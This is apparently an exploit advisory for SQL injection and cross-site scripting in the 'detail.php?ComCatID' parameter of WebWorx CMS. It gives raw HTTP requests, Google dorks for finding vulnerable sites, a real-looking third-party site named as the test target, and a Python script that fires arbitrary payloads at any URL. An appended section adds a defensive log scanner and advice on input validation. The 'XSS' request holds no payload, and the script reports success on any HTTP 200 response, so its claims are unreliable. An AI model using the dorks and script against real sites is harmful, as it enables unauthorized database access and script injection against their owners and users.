# Exploit Title: WebWorx CMS - SQL Injection & Cross-Site Scripting (XSS) Vulnerabilities
# Date: 2025-03-25
# Exploit Author: wa0_3/@td9_l
# Telegram: @wa0_3
# Vendor Homepage: https://webworx.technology/
# Version: 1.0
# Tested on: http://www.native.edu.pk
# Category: WebApps
# CVE: N/A

## Vulnerable Endpoint:

SQLI

```
GET /detail.php?ComCatID=26' HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="128", "Chromium";v="128"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
```

XSS

```
GET /detail.php?ComCatID=25 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="128", "Chromium";v="128"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
```

## Google Dork:

```
intxt: Developed by Webworx Technologies
inurl:detail.php?ComCatID=
```

## Proof of Concept (PoC):

```
import argparse
import requests

parser = argparse.ArgumentParser(description='Exploit SQLi & XSS in WebWorx CMS')
parser.add_argument('-url', help='Target URL (e.g., http://example.com)', required=True)
parser.add_argument('-payload', help='SQLi or XSS payload', required=True)
args = parser.parse_args()

# The payload is placed directly in the ComCatID query parameter of detail.php
url = f"{args.url}/detail.php?ComCatID={args.payload}"

# Browser-like request headers
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8",
    "Accept-Encoding": "gzip, deflate, br",
    "Accept-Language": "en-US,en;q=0.9",
    "Connection": "keep-alive"
}

response = requests.get(url, headers=headers)

# The script reports success on any HTTP 200 response and prints the body
if response.status_code == 200:
    print("[+] Exploit Successful!")
    print("[+] Response:")
    print(response.text)
else:
    print("[-] Exploit Failed")
```

## Credits:

Discovered by **wa0_3** (@wa0_3)
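
## Detection example (added)

Both requests above reach `detail.php` through the `ComCatID` parameter, and the SQLi request differs from a normal one only by the `'` appended to `26`. The following is an added example, not part of the original advisory or the vendor's code: it scans web server access logs for requests to `detail.php` whose `ComCatID` is not a plain integer. It assumes combined log format and that legitimate category IDs are decimal integers; the function name and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined format, documentation IP ranges); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [25/Mar/2025:10:00:01 +0000] "GET /detail.php?ComCatID=26 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [25/Mar/2025:10:00:07 +0000] "GET /detail.php?ComCatID=26%27 HTTP/1.1" 200 312 "-" "Mozilla/5.0"
203.0.113.9 - - [25/Mar/2025:10:00:09 +0000] "GET /detail.php?ComCatID=25%3Cb%3Ex%3C%2Fb%3E HTTP/1.1" 200 5300 "-" "Mozilla/5.0"
198.51.100.2 - - [25/Mar/2025:10:01:00 +0000] "GET /detail.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"
198.51.100.2 - - [25/Mar/2025:10:01:02 +0000] "GET /index.php?ComCatID=x HTTP/1.1" 200 900 "-" "Mozilla/5.0"
198.51.100.7 - - [25/Mar/2025:10:02:00 +0000] "GET /detail.php?ComCatID=1&ComCatID=2%20abc HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# Captures client address, request target and status code from a combined-format line.
LINE_RE = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+" (\d{3}) ')


def flag_noninteger_ids(log_text, page="/detail.php", param="ComCatID"):
    """Return (client, status, offending_values) for each request to `page`
    whose `param` holds anything other than ASCII digits after URL-decoding."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a request line this pattern understands
        client, target, status = m.groups()
        parts = urlsplit(target)
        if not parts.path.lower().endswith(page):
            continue  # some other script; the parameter name alone is not enough
        # parse_qs percent-decodes values and keeps every repeated occurrence.
        values = parse_qs(parts.query, keep_blank_values=True).get(param, [])
        bad = [v for v in values if not re.fullmatch(r"[0-9]+", v)]
        if bad:
            findings.append((client, int(status), bad))
    return findings


if __name__ == "__main__":
    for client, status, bad in flag_noninteger_ids(SAMPLE_LOG):
        print(f"{client} status={status} ComCatID={bad!r}")
```

The same integer-only rule is what the server side should enforce before the value reaches a query or the page output, with a parameterized query and output encoding behind it.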